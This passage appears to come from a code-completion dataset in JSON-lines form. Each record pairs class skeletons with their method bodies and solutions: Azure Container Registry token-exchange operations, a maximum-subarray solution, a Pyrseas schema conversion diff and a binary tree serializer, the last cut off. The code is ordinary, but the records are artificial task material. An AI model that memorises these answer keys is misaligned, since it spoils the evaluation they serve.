**kwargs: Any) -> _models.AcrRefreshToken: Exchange AAD tokens for an ACR refresh Token. :param grant_type: Can take a value of access_token_refresh_token, or access_token, or refresh_token. :type grant_type: str or ~container_registry.models.PostContentSchemaGrantType :param service: Indicates the name of your Azure container registry. :type service: str :param tenant: AAD tenant associated to the AAD credentials. Default value is None. :type tenant: str :param refresh_token: AAD refresh token, mandatory when grant_type is access_token_refresh_token or refresh_token. Default value is None. :type refresh_token: str :param access_token: AAD access token, mandatory when grant_type is access_token_refresh_token or access_token. Default\n- async def exchange_acr_refresh_token_for_acr_access_token(self, service: str, scope: str, refresh_token: str, grant_type: Union[str, '_models.TokenGrantType']='refresh_token', **kwargs: Any) -> _models.AcrAccessToken: Exchange ACR Refresh token for an ACR Access Token. :param service: Indicates the name of your Azure container registry. :type service: str :param scope: Which is expected to be a valid scope, and can be specified more than once for multiple scope requests. You obtained this from the Www-Authenticate response header from the challenge. :type scope: str :param refresh_token: Must be a valid ACR refresh token. :type refresh_token: str :param grant_type: Grant type is expected to be refresh_token. Default value is \"refresh_token\". :type grant_type: str or ~container_registry.models.TokenGrantType :keyword callable cls: A custom type or function that will be passed the direct response :return: A\n\n<|skeleton|>\nclass AuthenticationOperations:\n\n async def exchange_aad_access_token_for_acr_refresh_token(self, grant_type: Union[str, '_models.PostContentSchemaGrantType'], service: str, tenant: Optional[str]=None, refresh_token: Optional[str]=None, access_token: Optional[str]=None, **kwargs: Any) -> _models.AcrRefreshToken:\n \"\"\"Exchange AAD tokens for an ACR refresh Token. :param grant_type: Can take a value of access_token_refresh_token, or access_token, or refresh_token. :type grant_type: str or ~container_registry.models.PostContentSchemaGrantType :param service: Indicates the name of your Azure container registry. :type service: str :param tenant: AAD tenant associated to the AAD credentials. Default value is None. :type tenant: str :param refresh_token: AAD refresh token, mandatory when grant_type is access_token_refresh_token or refresh_token. Default value is None. :type refresh_token: str :param access_token: AAD access token, mandatory when grant_type is access_token_refresh_token or access_token. Default\"\"\"\n <|body_0|>\n\n async def exchange_acr_refresh_token_for_acr_access_token(self, service: str, scope: str, refresh_token: str, grant_type: Union[str, '_models.TokenGrantType']='refresh_token', **kwargs: Any) -> _models.AcrAccessToken:\n \"\"\"Exchange ACR Refresh token for an ACR Access Token. :param service: Indicates the name of your Azure container registry. :type service: str :param scope: Which is expected to be a valid scope, and can be specified more than once for multiple scope requests. You obtained this from the Www-Authenticate response header from the challenge. :type scope: str :param refresh_token: Must be a valid ACR refresh token. :type refresh_token: str :param grant_type: Grant type is expected to be refresh_token. Default value is \"refresh_token\". :type grant_type: str or ~container_registry.models.TokenGrantType :keyword callable cls: A custom type or function that will be passed the direct response :return: A\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}\n error_map.update(kwargs.pop('error_map', {}) or {})\n _headers = case_insensitive_dict(kwargs.pop('headers', {}) or {})\n _params = case_insensitive_dict(kwargs.pop('params', {}) or {})\n api_version = kwargs.pop('api_version', _params.pop('api-version', '2021-07-01'))\n content_type = kwargs.pop('content_type', _headers.pop('Content-Type', 'application/x-www-form-urlencoded'))\n cls = kwargs.pop('cls', None)\n _data = {'grant_type': grant_type, 'service': service, 'tenant': tenant, 'refresh_token': refresh_token, 'access_token': access_token}\n request = build_exchange_aad_access_token_for_acr_refresh_token_request(api_version=api_version, content_type=content_type, data=_data, headers=_headers, params=_params)\n path_format_arguments = {'url': self._serialize.url('self._config.url', self._config.url, 'str', skip_quote=True)}\n request.url = self._client.format_url(request.url, **path_format_arguments)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize.failsafe_deserialize(_models.AcrErrors, pipeline_response)\n raise HttpResponseError(response=response, model=error)\n deserialized = self._deserialize('AcrRefreshToken', pipeline_response)\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n<|end_body_0|>\n\n<|body_start_1|>\n error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}\n error_map.update(kwargs.pop('error_map', {}) or {})\n _headers = case_insensitive_dict(kwargs.pop('headers', {}) or {})\n _params = case_insensitive_dict(kwargs.pop('params', {}) or {})\n api_version = kwargs.pop('api_version', _params.pop('api-version', '2021-07-01'))\n content_type = kwargs.pop('content_type', _headers.pop('Content-Type', 'application/x-www-form-urlencoded'))\n cls = kwargs.pop('cls', None)\n _data = {'service': service, 'scope': scope, 'refresh_token': refresh_token, 'grant_type': grant_type}\n request = build_exchange_acr_refresh_token_for_acr_access_token_request(api_version=api_version, content_type=content_type, data=_data, headers=_headers, params=_params)\n path_format_arguments = {'url': self._serialize.url('self._config.url', self._config.url, 'str', skip_quote=True)}\n request.url = self._client.format_url(request.url, **path_format_arguments)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize.failsafe_deserialize(_models.AcrErrors, pipeline_response)\n raise HttpResponseError(response=response, model=error)\n deserialized = self._deserialize('AcrAccessToken', pipeline_response)\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n<|end_body_1|>\n", "revision_id": "c2ca191e736bb06bfbbbc9493e8325763ba990bb", "skeleton": "<|skeleton|>\nclass AuthenticationOperations:\n\n async def exchange_aad_access_token_for_acr_refresh_token(self, grant_type: Union[str, '_models.PostContentSchemaGrantType'], service: str, tenant: Optional[str]=None, refresh_token: Optional[str]=None, access_token: Optional[str]=None, **kwargs: Any) -> _models.AcrRefreshToken:\n \"\"\"Exchange AAD tokens for an ACR refresh Token. :param grant_type: Can take a value of access_token_refresh_token, or access_token, or refresh_token. :type grant_type: str or ~container_registry.models.PostContentSchemaGrantType :param service: Indicates the name of your Azure container registry. :type service: str :param tenant: AAD tenant associated to the AAD credentials. Default value is None. :type tenant: str :param refresh_token: AAD refresh token, mandatory when grant_type is access_token_refresh_token or refresh_token. Default value is None. :type refresh_token: str :param access_token: AAD access token, mandatory when grant_type is access_token_refresh_token or access_token. Default\"\"\"\n <|body_0|>\n\n async def exchange_acr_refresh_token_for_acr_access_token(self, service: str, scope: str, refresh_token: str, grant_type: Union[str, '_models.TokenGrantType']='refresh_token', **kwargs: Any) -> _models.AcrAccessToken:\n \"\"\"Exchange ACR Refresh token for an ACR Access Token. :param service: Indicates the name of your Azure container registry. :type service: str :param scope: Which is expected to be a valid scope, and can be specified more than once for multiple scope requests. You obtained this from the Www-Authenticate response header from the challenge. :type scope: str :param refresh_token: Must be a valid ACR refresh token. :type refresh_token: str :param grant_type: Grant type is expected to be refresh_token. Default value is \"refresh_token\". :type grant_type: str or ~container_registry.models.TokenGrantType :keyword callable cls: A custom type or function that will be passed the direct response :return: A\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AuthenticationOperations:\n async def exchange_aad_access_token_for_acr_refresh_token(self, grant_type: Union[str, '_models.PostContentSchemaGrantType'], service: str, tenant: Optional[str]=None, refresh_token: Optional[str]=None, access_token: Optional[str]=None, **kwargs: Any) -> _models.AcrRefreshToken:\n \"\"\"Exchange AAD tokens for an ACR refresh Token. :param grant_type: Can take a value of access_token_refresh_token, or access_token, or refresh_token. :type grant_type: str or ~container_registry.models.PostContentSchemaGrantType :param service: Indicates the name of your Azure container registry. :type service: str :param tenant: AAD tenant associated to the AAD credentials. Default value is None. :type tenant: str :param refresh_token: AAD refresh token, mandatory when grant_type is access_token_refresh_token or refresh_token. Default value is None. :type refresh_token: str :param access_token: AAD access token, mandatory when grant_type is access_token_refresh_token or access_token. Default\"\"\"\n error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}\n error_map.update(kwargs.pop('error_map', {}) or {})\n _headers = case_insensitive_dict(kwargs.pop('headers', {}) or {})\n _params = case_insensitive_dict(kwargs.pop('params', {}) or {})\n api_version = kwargs.pop('api_version', _params.pop('api-version', '2021-07-01'))\n content_type = kwargs.pop('content_type', _headers.pop('Content-Type', 'application/x-www-form-urlencoded'))\n cls = kwargs.pop('cls', None)\n _data = {'grant_type': grant_type, 'service': service, 'tenant': tenant, 'refresh_token': refresh_token, 'access_token': access_token}\n request = build_exchange_aad_access_token_for_acr_refresh_token_request(api_version=api_version, content_type=content_type, data=_data, headers=_headers, params=_params)\n path_format_arguments = {'url': self._serialize.url('self._config.url', self._config.url, 'str', skip_quote=True)}\n request.url = self._client.format_url(request.url, **path_format_arguments)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize.failsafe_deserialize(_models.AcrErrors, pipeline_response)\n raise HttpResponseError(response=response, model=error)\n deserialized = self._deserialize('AcrRefreshToken', pipeline_response)\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n\n async def exchange_acr_refresh_token_for_acr_access_token(self, service: str, scope: str, refresh_token: str, grant_type: Union[str, '_models.TokenGrantType']='refresh_token', **kwargs: Any) -> _models.AcrAccessToken:\n \"\"\"Exchange ACR Refresh token for an ACR Access Token. :param service: Indicates the name of your Azure container registry. :type service: str :param scope: Which is expected to be a valid scope, and can be specified more than once for multiple scope requests. You obtained this from the Www-Authenticate response header from the challenge. :type scope: str :param refresh_token: Must be a valid ACR refresh token. :type refresh_token: str :param grant_type: Grant type is expected to be refresh_token. Default value is \"refresh_token\". :type grant_type: str or ~container_registry.models.TokenGrantType :keyword callable cls: A custom type or function that will be passed the direct response :return: A\"\"\"\n error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}\n error_map.update(kwargs.pop('error_map', {}) or {})\n _headers = case_insensitive_dict(kwargs.pop('headers', {}) or {})\n _params = case_insensitive_dict(kwargs.pop('params', {}) or {})\n api_version = kwargs.pop('api_version', _params.pop('api-version', '2021-07-01'))\n content_type = kwargs.pop('content_type', _headers.pop('Content-Type', 'application/x-www-form-urlencoded'))\n cls = kwargs.pop('cls', None)\n _data = {'service': service, 'scope': scope, 'refresh_token': refresh_token, 'grant_type': grant_type}\n request = build_exchange_acr_refresh_token_for_acr_access_token_request(api_version=api_version, content_type=content_type, data=_data, headers=_headers, params=_params)\n path_format_arguments = {'url': self._serialize.url('self._config.url', self._config.url, 'str', skip_quote=True)}\n request.url = self._client.format_url(request.url, **path_format_arguments)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize.failsafe_deserialize(_models.AcrErrors, pipeline_response)\n raise HttpResponseError(response=response, model=error)\n deserialized = self._deserialize('AcrAccessToken', pipeline_response)\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n", "source": "the_stack_v2_python_sparse", "source_path": "sdk/containerregistry/azure-containerregistry/azure/containerregistry/_generated/aio/operations/_patch.py", "source_repo": "Azure/azure-sdk-for-python", "split": "test", "star_events_count": 4046} {"blob_id": "4328facf43ff7495b3105a47072a7a493f829876", "bodies": ["sum = nums[0]\nmax_sum = nums[0]\nfor i in range(1, len(nums)):\n if sum < 0:\n sum = 0\n sum += nums[i]\n max_sum = max(sum, max_sum)\nreturn max_sum", "for i in range(1, len(nums)):\n if nums[i - 1] > 0:\n nums[i] += nums[i - 1]\nreturn max(nums)"], "bodies_text": "<|body_start_0|>\n sum = nums[0]\n max_sum = nums[0]\n for i in range(1, len(nums)):\n if sum < 0:\n sum = 0\n sum += nums[i]\n max_sum = max(sum, max_sum)\n return max_sum\n<|end_body_0|>\n\n<|body_start_1|>\n for i in range(1, len(nums)):\n if nums[i - 1] > 0:\n nums[i] += nums[i - 1]\n return max(nums)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def maxSubArray(self, nums):\n \"\"\"和最大的子列表 :type nums: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def maxSubArray2(self, nums):\n \"\"\"和最大的子列表 :type nums: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sum = nums[0]\n max_sum = nums[0]\n for i in range(1, len(nums)):\n if sum < 0:\n sum = 0\n sum += nums[i]\n max_sum = max(sum, max_sum)\n return max_sum\n<|end_body_0|>\n\n<|body_start_1|>\n for i in range(1, len(nums)):\n if nums[i - 1] > 0:\n nums[i] += nums[i - 1]\n return max(nums)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000099", "length_bytes": 1389, "license_type": "no_license", "methods": [{"docstring": "和最大的子列表 :type nums: List[int] :rtype: int", "name": "maxSubArray", "signature": "def maxSubArray(self, nums)"}, {"docstring": "和最大的子列表 :type nums: List[int] :rtype: int", "name": "maxSubArray2", "signature": "def maxSubArray2(self, nums)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002828", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxSubArray(self, nums): 和最大的子列表 :type nums: List[int] :rtype: int\n- def maxSubArray2(self, nums): 和最大的子列表 :type nums: List[int] :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxSubArray(self, nums): 和最大的子列表 :type nums: List[int] :rtype: int\n- def maxSubArray2(self, nums): 和最大的子列表 :type nums: List[int] :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def maxSubArray(self, nums):\n \"\"\"和最大的子列表 :type nums: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def maxSubArray2(self, nums):\n \"\"\"和最大的子列表 :type nums: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sum = nums[0]\n max_sum = nums[0]\n for i in range(1, len(nums)):\n if sum < 0:\n sum = 0\n sum += nums[i]\n max_sum = max(sum, max_sum)\n return max_sum\n<|end_body_0|>\n\n<|body_start_1|>\n for i in range(1, len(nums)):\n if nums[i - 1] > 0:\n nums[i] += nums[i - 1]\n return max(nums)\n<|end_body_1|>\n", "revision_id": "04d87d76b762f6ea7cfb3a453382b2d7d4e154dc", "skeleton": "<|skeleton|>\nclass Solution:\n\n def maxSubArray(self, nums):\n \"\"\"和最大的子列表 :type nums: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def maxSubArray2(self, nums):\n \"\"\"和最大的子列表 :type nums: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def maxSubArray(self, nums):\n \"\"\"和最大的子列表 :type nums: List[int] :rtype: int\"\"\"\n sum = nums[0]\n max_sum = nums[0]\n for i in range(1, len(nums)):\n if sum < 0:\n sum = 0\n sum += nums[i]\n max_sum = max(sum, max_sum)\n return max_sum\n\n def maxSubArray2(self, nums):\n \"\"\"和最大的子列表 :type nums: List[int] :rtype: int\"\"\"\n for i in range(1, len(nums)):\n if nums[i - 1] > 0:\n nums[i] += nums[i - 1]\n return max(nums)\n", "source": "the_stack_v2_python_sparse", "source_path": "leetcode/053 Maximum Subarray.py", "source_repo": "mofei952/algorithm_exercise", "split": "test", "star_events_count": 1} {"blob_id": "4373af4f7269b4351061ede4540076573c8b5d58", "bodies": ["for key in inmap:\n if not key.startswith('conversion '):\n raise KeyError('Unrecognized object type: %s' % key)\n cnv = key[11:]\n inconv = inmap[key]\n conv = Conversion(schema=schema.name, name=cnv, **inconv)\n if inconv:\n if 'oldname' in inconv:\n conv.oldname = inconv['oldname']\n del inconv['oldname']\n if 'description' in inconv:\n conv.description = inconv['description']\n self[schema.name, cnv] = conv", "stmts = []\nfor cnv in inconvs:\n inconv = inconvs[cnv]\n if cnv in self:\n stmts.append(self[cnv].diff_map(inconv))\n elif hasattr(inconv, 'oldname'):\n oldname = inconv.oldname\n try:\n stmts.append(self[oldname].rename(inconv.name))\n del self[oldname]\n except KeyError as exc:\n exc.args = (\"Previous name '%s' for conversion '%s' not found\" % (oldname, inconv.name),)\n raise\n else:\n stmts.append(inconv.create())\nfor sch, cnv in self:\n if (sch, cnv) not in inconvs:\n stmts.append(self[sch, cnv].drop())\nreturn stmts"], "bodies_text": "<|body_start_0|>\n for key in inmap:\n if not key.startswith('conversion '):\n raise KeyError('Unrecognized object type: %s' % key)\n cnv = key[11:]\n inconv = inmap[key]\n conv = Conversion(schema=schema.name, name=cnv, **inconv)\n if inconv:\n if 'oldname' in inconv:\n conv.oldname = inconv['oldname']\n del inconv['oldname']\n if 'description' in inconv:\n conv.description = inconv['description']\n self[schema.name, cnv] = conv\n<|end_body_0|>\n\n<|body_start_1|>\n stmts = []\n for cnv in inconvs:\n inconv = inconvs[cnv]\n if cnv in self:\n stmts.append(self[cnv].diff_map(inconv))\n elif hasattr(inconv, 'oldname'):\n oldname = inconv.oldname\n try:\n stmts.append(self[oldname].rename(inconv.name))\n del self[oldname]\n except KeyError as exc:\n exc.args = (\"Previous name '%s' for conversion '%s' not found\" % (oldname, inconv.name),)\n raise\n else:\n stmts.append(inconv.create())\n for sch, cnv in self:\n if (sch, cnv) not in inconvs:\n stmts.append(self[sch, cnv].drop())\n return stmts\n<|end_body_1|>\n", "class_docstring": "The collection of conversions in a database.", "class_name": "ConversionDict", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ConversionDict:\n \"\"\"The collection of conversions in a database.\"\"\"\n\n def from_map(self, schema, inmap):\n \"\"\"Initialize the dictionary of conversions by examining the input map :param schema: the schema owing the conversions :param inmap: the input YAML map defining the conversions\"\"\"\n <|body_0|>\n\n def diff_map(self, inconvs):\n \"\"\"Generate SQL to transform existing conversions :param inconvs: a YAML map defining the new conversions :return: list of SQL statements Compares the existing conversion definitions, as fetched from the catalogs, to the input map and generates SQL statements to create, drop or change the conversions accordingly.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for key in inmap:\n if not key.startswith('conversion '):\n raise KeyError('Unrecognized object type: %s' % key)\n cnv = key[11:]\n inconv = inmap[key]\n conv = Conversion(schema=schema.name, name=cnv, **inconv)\n if inconv:\n if 'oldname' in inconv:\n conv.oldname = inconv['oldname']\n del inconv['oldname']\n if 'description' in inconv:\n conv.description = inconv['description']\n self[schema.name, cnv] = conv\n<|end_body_0|>\n\n<|body_start_1|>\n stmts = []\n for cnv in inconvs:\n inconv = inconvs[cnv]\n if cnv in self:\n stmts.append(self[cnv].diff_map(inconv))\n elif hasattr(inconv, 'oldname'):\n oldname = inconv.oldname\n try:\n stmts.append(self[oldname].rename(inconv.name))\n del self[oldname]\n except KeyError as exc:\n exc.args = (\"Previous name '%s' for conversion '%s' not found\" % (oldname, inconv.name),)\n raise\n else:\n stmts.append(inconv.create())\n for sch, cnv in self:\n if (sch, cnv) not in inconvs:\n stmts.append(self[sch, cnv].drop())\n return stmts\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000100", "length_bytes": 4035, "license_type": "permissive", "methods": [{"docstring": "Initialize the dictionary of conversions by examining the input map :param schema: the schema owing the conversions :param inmap: the input YAML map defining the conversions", "name": "from_map", "signature": "def from_map(self, schema, inmap)"}, {"docstring": "Generate SQL to transform existing conversions :param inconvs: a YAML map defining the new conversions :return: list of SQL statements Compares the existing conversion definitions, as fetched from the catalogs, to the input map and generates SQL statements to create, drop or change the conversions accordingly.", "name": "diff_map", "signature": "def diff_map(self, inconvs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_val_000032", "prompt": "Implement the Python class `ConversionDict` described below.\n\nClass description:\nThe collection of conversions in a database.\n\nMethod signatures and docstrings:\n- def from_map(self, schema, inmap): Initialize the dictionary of conversions by examining the input map :param schema: the schema owing the conversions :param inmap: the input YAML map defining the conversions\n- def diff_map(self, inconvs): Generate SQL to transform existing conversions :param inconvs: a YAML map defining the new conversions :return: list of SQL statements Compares the existing conversion definitions, as fetched from the catalogs, to the input map and generates SQL statements to create, drop or change the conversions accordingly.", "prompted_full_text": "Implement the Python class `ConversionDict` described below.\n\nClass description:\nThe collection of conversions in a database.\n\nMethod signatures and docstrings:\n- def from_map(self, schema, inmap): Initialize the dictionary of conversions by examining the input map :param schema: the schema owing the conversions :param inmap: the input YAML map defining the conversions\n- def diff_map(self, inconvs): Generate SQL to transform existing conversions :param inconvs: a YAML map defining the new conversions :return: list of SQL statements Compares the existing conversion definitions, as fetched from the catalogs, to the input map and generates SQL statements to create, drop or change the conversions accordingly.\n\n<|skeleton|>\nclass ConversionDict:\n \"\"\"The collection of conversions in a database.\"\"\"\n\n def from_map(self, schema, inmap):\n \"\"\"Initialize the dictionary of conversions by examining the input map :param schema: the schema owing the conversions :param inmap: the input YAML map defining the conversions\"\"\"\n <|body_0|>\n\n def diff_map(self, inconvs):\n \"\"\"Generate SQL to transform existing conversions :param inconvs: a YAML map defining the new conversions :return: list of SQL statements Compares the existing conversion definitions, as fetched from the catalogs, to the input map and generates SQL statements to create, drop or change the conversions accordingly.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for key in inmap:\n if not key.startswith('conversion '):\n raise KeyError('Unrecognized object type: %s' % key)\n cnv = key[11:]\n inconv = inmap[key]\n conv = Conversion(schema=schema.name, name=cnv, **inconv)\n if inconv:\n if 'oldname' in inconv:\n conv.oldname = inconv['oldname']\n del inconv['oldname']\n if 'description' in inconv:\n conv.description = inconv['description']\n self[schema.name, cnv] = conv\n<|end_body_0|>\n\n<|body_start_1|>\n stmts = []\n for cnv in inconvs:\n inconv = inconvs[cnv]\n if cnv in self:\n stmts.append(self[cnv].diff_map(inconv))\n elif hasattr(inconv, 'oldname'):\n oldname = inconv.oldname\n try:\n stmts.append(self[oldname].rename(inconv.name))\n del self[oldname]\n except KeyError as exc:\n exc.args = (\"Previous name '%s' for conversion '%s' not found\" % (oldname, inconv.name),)\n raise\n else:\n stmts.append(inconv.create())\n for sch, cnv in self:\n if (sch, cnv) not in inconvs:\n stmts.append(self[sch, cnv].drop())\n return stmts\n<|end_body_1|>\n", "revision_id": "0133f3bc522890e0564d27de6791824acb4d2773", "skeleton": "<|skeleton|>\nclass ConversionDict:\n \"\"\"The collection of conversions in a database.\"\"\"\n\n def from_map(self, schema, inmap):\n \"\"\"Initialize the dictionary of conversions by examining the input map :param schema: the schema owing the conversions :param inmap: the input YAML map defining the conversions\"\"\"\n <|body_0|>\n\n def diff_map(self, inconvs):\n \"\"\"Generate SQL to transform existing conversions :param inconvs: a YAML map defining the new conversions :return: list of SQL statements Compares the existing conversion definitions, as fetched from the catalogs, to the input map and generates SQL statements to create, drop or change the conversions accordingly.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ConversionDict:\n \"\"\"The collection of conversions in a database.\"\"\"\n\n def from_map(self, schema, inmap):\n \"\"\"Initialize the dictionary of conversions by examining the input map :param schema: the schema owing the conversions :param inmap: the input YAML map defining the conversions\"\"\"\n for key in inmap:\n if not key.startswith('conversion '):\n raise KeyError('Unrecognized object type: %s' % key)\n cnv = key[11:]\n inconv = inmap[key]\n conv = Conversion(schema=schema.name, name=cnv, **inconv)\n if inconv:\n if 'oldname' in inconv:\n conv.oldname = inconv['oldname']\n del inconv['oldname']\n if 'description' in inconv:\n conv.description = inconv['description']\n self[schema.name, cnv] = conv\n\n def diff_map(self, inconvs):\n \"\"\"Generate SQL to transform existing conversions :param inconvs: a YAML map defining the new conversions :return: list of SQL statements Compares the existing conversion definitions, as fetched from the catalogs, to the input map and generates SQL statements to create, drop or change the conversions accordingly.\"\"\"\n stmts = []\n for cnv in inconvs:\n inconv = inconvs[cnv]\n if cnv in self:\n stmts.append(self[cnv].diff_map(inconv))\n elif hasattr(inconv, 'oldname'):\n oldname = inconv.oldname\n try:\n stmts.append(self[oldname].rename(inconv.name))\n del self[oldname]\n except KeyError as exc:\n exc.args = (\"Previous name '%s' for conversion '%s' not found\" % (oldname, inconv.name),)\n raise\n else:\n stmts.append(inconv.create())\n for sch, cnv in self:\n if (sch, cnv) not in inconvs:\n stmts.append(self[sch, cnv].drop())\n return stmts\n", "source": "the_stack_v2_python_sparse", "source_path": "pyrseas/dbobject/conversion.py", "source_repo": "vayerx/Pyrseas", "split": "test", "star_events_count": 1} {"blob_id": "aaa9dcdb4bce2e61a58e426639a168bd91edddef", "bodies": ["if not root:\n return ''\nqueue = deque()\nqueue.append(root)\nres = ''\nwhile len(queue):\n node = queue.popleft()\n if not node:\n res += 'n '\n continue\n res += str(node.val) + ' '\n queue.append(node.left)\n queue.append(node.right)\nreturn res", "if data == '':\n return None\nqueue = deque()\nvalues = data.split()\nroot = TreeNode(int(values[0]))\nqueue.append(root)\ni = 1\nwhile i < len(values):\n parent = queue.popleft()\n if values[i] != 'n':\n left = TreeNode(int(values[i]))\n parent.left = left\n queue.append(left)\n i += 1\n if values[i] != 'n':\n right = TreeNode(int(values[i]))\n parent.right = right\n queue.append(right)\n i += 1\nreturn root"], "bodies_text": "<|body_start_0|>\n if not root:\n return ''\n queue = deque()\n queue.append(root)\n res = ''\n while len(queue):\n node = queue.popleft()\n if not node:\n res += 'n '\n continue\n res += str(node.val) + ' '\n queue.append(node.left)\n queue.append(node.right)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n if data == '':\n return None\n queue = deque()\n values = data.split()\n root = TreeNode(int(values[0]))\n queue.append(root)\n i = 1\n while i < len(values):\n parent = queue.popleft()\n if values[i] != 'n':\n left = TreeNode(int(values[i]))\n parent.left = left\n queue.append(left)\n i += 1\n if values[i] != 'n':\n right = TreeNode(int(values[i]))\n parent.right = right\n queue.append(right)\n i += 1\n return root\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root:\n return ''\n queue = deque()\n queue.append(root)\n res = ''\n while len(queue):\n node = queue.popleft()\n if not node:\n res += 'n '\n continue\n res += str(node.val) + ' '\n queue.append(node.left)\n queue.append(node.right)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n if data == '':\n return None\n queue = deque()\n values = data.split()\n root = TreeNode(int(values[0]))\n queue.append(root)\n i = 1\n while i < len(values):\n parent = queue.popleft()\n if values[i] != 'n':\n left = TreeNode(int(values[i]))\n parent.left = left\n queue.append(left)\n i += 1\n if values[i] != 'n':\n right = TreeNode(int(values[i]))\n parent.right = right\n queue.append(right)\n i += 1\n return root\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000101", "length_bytes": 1455, "license_type": "permissive", "methods": [{"docstring": "Encodes a tree to a single string. :type root: TreeNode :rtype: str", "name": "serialize", "signature": "def serialize(self, root)"}, {"docstring": "Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "name": "deserialize", "signature": "def deserialize(self, data)"}], "n_methods": 2, "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: TreeNode :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: TreeNode :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root:\n return ''\n queue = deque()\n queue.append(root)\n res = ''\n while len(queue):\n node = queue.popleft()\n if not node:\n res += 'n '\n continue\n res += str(node.val) + ' '\n queue.append(node.left)\n queue.append(node.right)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n if data == '':\n return None\n queue = deque()\n values = data.split()\n root = TreeNode(int(values[0]))\n queue.append(root)\n i = 1\n while i < len(values):\n parent = queue.popleft()\n if values[i] != 'n':\n left = TreeNode(int(values[i]))\n parent.left = left\n queue.append(left)\n i += 1\n if values[i] != 'n':\n right = TreeNode(int(values[i]))\n parent.right = right\n queue.append(right)\n i += 1\n return root\n<|end_body_1|>\n", "revision_id": "90b6287b742c8bfd3797540c408d679be2821a40", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: 